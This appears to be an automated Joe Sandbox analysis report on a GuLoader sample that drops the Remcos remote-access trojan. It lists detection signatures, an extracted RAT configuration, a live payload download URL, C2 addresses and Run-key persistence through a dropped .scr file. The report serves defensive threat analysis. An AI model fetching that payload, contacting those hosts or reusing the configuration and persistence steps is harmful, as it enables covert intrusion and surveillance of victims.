Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ix8kxoBHDb.exe

Overview

General Information

Sample name:ix8kxoBHDb.exe
renamed because original name is a hash value
Original sample name:d0625305c7cada6abafc98eca583c35ac2e25028cb63f43fee168b9bb6c5f8fb.exe
Analysis ID:1588998
MD5:d09dbfcaacc4e72dc2ff2d9119b7b9f1
SHA1:8691ac9bbabbe829446b56c73888d8a0adf0b92b
SHA256:d0625305c7cada6abafc98eca583c35ac2e25028cb63f43fee168b9bb6c5f8fb
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • ix8kxoBHDb.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\ix8kxoBHDb.exe" MD5: D09DBFCAACC4E72DC2FF2D9119B7B9F1)
    • ix8kxoBHDb.exe (PID: 7876 cmdline: "C:\Users\user\Desktop\ix8kxoBHDb.exe" MD5: D09DBFCAACC4E72DC2FF2D9119B7B9F1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["ro:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-X164UO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1444216544.0000000004C79000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: ix8kxoBHDb.exe PID: 7876JoeSecurity_RemcosYara detected Remcos RATJoe Security

          System Summary

          barindex
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
          Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

          Stealing of Sensitive Information

          barindex
          Source: Registry Key setAuthor: Joe Security: Data: Details: 2B E1 25 85 10 02 9B 5B 9C 1F E2 F8 78 93 E7 18 FE 0C AF CD 94 96 BF 63 36 84 04 8B F1 0B 3E FB 28 96 EC 4D 58 38 5F 76 49 F1 3D 6B 79 C7 6F 36 CF 55 6F 5B 7C 38 6D 70 BE A5 5B 4A 26 3E 81 BC 69 C8 83 85 48 7F A3 14 25 FA 9D 28 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-X164UO\exepath
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-11T08:11:49.256053+010028032702Potentially Bad Traffic192.168.2.1149867164.160.91.32443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["ro:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-X164UO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
          Source: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scrReversingLabs: Detection: 63%
          Source: ix8kxoBHDb.exeReversingLabs: Detection: 63%
          Source: ix8kxoBHDb.exeVirustotal: Detection: 70%Perma Link
          Source: Yara matchFile source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scrJoe Sandbox ML: detected
          Source: ix8kxoBHDb.exeJoe Sandbox ML: detected
          Source: ix8kxoBHDb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.11:49867 version: TLS 1.2
          Source: ix8kxoBHDb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_0040672B FindFirstFileW,FindClose,2_2_0040672B
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405AFA

          Networking

          barindex
          Source: Malware configuration extractorURLs: ro
          Source: Joe Sandbox ViewIP Address: 164.160.91.32 164.160.91.32
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49867 -> 164.160.91.32:443
          Source: global trafficHTTP traffic detected: GET /cdOCcPHZK213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /cdOCcPHZK213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: www.healthselflesssupplies.co.za
          Source: global trafficDNS traffic detected: DNS query: kezdns.pro
          Source: ix8kxoBHDb.exe, Leucocytopenia.scr.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/
          Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/%
          Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005858000.00000004.00000020.00020000.00000000.sdmp, ix8kxoBHDb.exe, 00000002.00000002.3785385637.0000000007530000.00000004.00001000.00020000.00000000.sdmp, ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bin
          Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bins
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.11:49867 version: TLS 1.2
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004034A5
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00404DCC0_2_00404DCC
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00406AF20_2_00406AF2
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_73B01B5F0_2_73B01B5F
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_00404DCC2_2_00404DCC
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_00406AF22_2_00406AF2
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: String function: 00402C41 appears 51 times
          Source: ix8kxoBHDb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.evad.winEXE@3/11@45/1
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004034A5
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Roaming\brugserJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-X164UO
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Local\Temp\nslD2D9.tmpJump to behavior
          Source: ix8kxoBHDb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: ix8kxoBHDb.exeReversingLabs: Detection: 63%
          Source: ix8kxoBHDb.exeVirustotal: Detection: 70%
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile read: C:\Users\user\Desktop\ix8kxoBHDb.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: skovmandshilsnerne.lnk.0.drLNK file: ..\..\..\..\..\..\..\Windows\punktnedslagenes\Suspired157.Ege
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: ix8kxoBHDb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000000.00000002.1444216544.0000000004C79000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_73B01B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73B01B5F

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scrJump to dropped file
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scrJump to dropped file
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dllJump to dropped file

          Boot Survival

          barindex
